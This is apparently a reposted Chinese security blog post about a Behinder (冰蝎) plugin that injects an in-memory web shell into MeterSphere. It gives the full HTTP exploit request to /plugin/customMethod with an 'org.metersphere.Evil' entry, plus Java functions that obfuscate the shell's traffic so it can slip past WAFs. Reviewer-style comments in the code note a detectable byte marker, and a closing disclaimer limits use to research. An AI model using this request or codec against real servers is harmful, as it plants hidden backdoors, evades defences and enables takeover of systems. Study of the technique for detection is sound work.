命令执行
注入内存马
- 请求体的 request 字段为字符串 inject 的 Base64 编码(aW5qZWN0),用于触发冰蝎内存马注入
POST /plugin/customMethod HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Connection: close
Cookie: MS_SESSION_ID=75407ecc-369b-48a7-ae80-d000f0d1b700
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 65
{
"entry": "org.metersphere.Evil",
"request": "aW5qZWN0"
}
- 冰蝎加密函数
/**
 * Obfuscates a payload with a fixed, keyless transform: add 1 to every byte,
 * gzip the result, then add 1 to every byte of the gzip stream.
 *
 * <p>Reviewer note: no key or secret is involved, so this is encoding rather
 * than encryption. Anyone holding a traffic capture can reverse it by applying
 * the steps backwards. Because the gzip container always begins with the bytes
 * 1F 8B 08, output produced on the success path begins with 20 8C 09, which is
 * a stable marker for traffic inspection.
 *
 * @param data bytes to transform; must not be null
 * @return the transformed bytes, or {@code data} itself (unmodified) if the
 *         compression step throws
 */
private byte[] Encrypt(byte[] data) {
    // Stage 1: shift every input byte up by one (wraps around on overflow).
    byte[] shifted = new byte[data.length];
    int pos = 0;
    for (byte value : data) {
        shifted[pos++] = (byte) (value + 1);
    }

    try {
        // Stage 2: gzip the shifted bytes into an in-memory buffer.
        java.io.ByteArrayOutputStream sink = new java.io.ByteArrayOutputStream();
        java.util.zip.GZIPOutputStream gzip = new java.util.zip.GZIPOutputStream(sink);
        gzip.write(shifted);
        gzip.close(); // close() writes the gzip trailer; required before reading the buffer
        byte[] packed = sink.toByteArray();

        // Stage 3: shift every byte of the gzip stream up by one, hiding the gzip magic.
        byte[] result = new byte[packed.length];
        int k = 0;
        while (k < packed.length) {
            result[k] = (byte) (packed[k] + 1);
            k++;
        }
        return result;
    } catch (Exception ignored) {
        // Deliberately swallowed: on any failure the caller gets the raw input back.
    }
    return data;
}
- 冰蝎解密函数
/**
 * Reverses the keyless transform used on the wire: subtract 1 from every byte,
 * gunzip the result, then subtract 1 from every decompressed byte.
 *
 * <p>Reviewer notes for anyone reusing this to decode captured traffic:
 * decompression is unbounded (see {@link #r}), so cap the output size when
 * feeding it untrusted captures; and failures are silent, so a return value
 * equal to the input means decoding did not succeed.
 *
 * @param data obfuscated bytes; must not be null
 * @return the decoded bytes, or {@code data} itself (unmodified) if setting up
 *         the gzip stream throws (for example on empty or non-gzip input)
 */
private byte[] Decrypt(byte[] data) {
    // Undo the outer +1 shift so the gzip header becomes readable again.
    byte[] unshifted = new byte[data.length];
    int pos = 0;
    for (byte value : data) {
        unshifted[pos++] = (byte) (value - 1);
    }

    try {
        java.io.ByteArrayInputStream source = new java.io.ByteArrayInputStream(unshifted);
        // The buffer size equals the input length; a zero length makes the
        // constructor throw, which lands in the catch below.
        java.util.zip.GZIPInputStream gunzip =
            new java.util.zip.GZIPInputStream(source, unshifted.length);
        byte[] inflated = r(gunzip);

        // Undo the inner +1 shift applied before compression.
        byte[] plain = new byte[inflated.length];
        int k = 0;
        while (k < inflated.length) {
            plain[k] = (byte) (inflated[k] - 1);
            k++;
        }
        return plain;
    } catch (Exception ignored) {
        // Deliberately swallowed: on any failure the caller gets the raw input back.
    }
    return data;
}

/**
 * Drains a stream into a byte array using a 1024-byte scratch buffer.
 *
 * <p>There is no upper bound on how much is read, and a read error is
 * swallowed: whatever was collected before the error is returned, so a
 * truncated or corrupt stream yields partial output rather than an exception.
 *
 * @param i stream to read until end-of-stream
 * @return all bytes read before end-of-stream or the first read error
 */
private byte[] r(java.io.InputStream i) {
    byte[] chunk = new byte[1024];
    java.io.ByteArrayOutputStream collected = new java.io.ByteArrayOutputStream();
    try {
        int got = i.read(chunk);
        while (got != -1) {
            collected.write(chunk, 0, got);
            got = i.read(chunk);
        }
    } catch (Exception ignored) {
        // Deliberately swallowed: return what has been read so far.
    }
    return collected.toByteArray();
}
原文始发于微信公众号(夜组安全):冰蝎插件-支持注入内存马和Bypass WAF
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。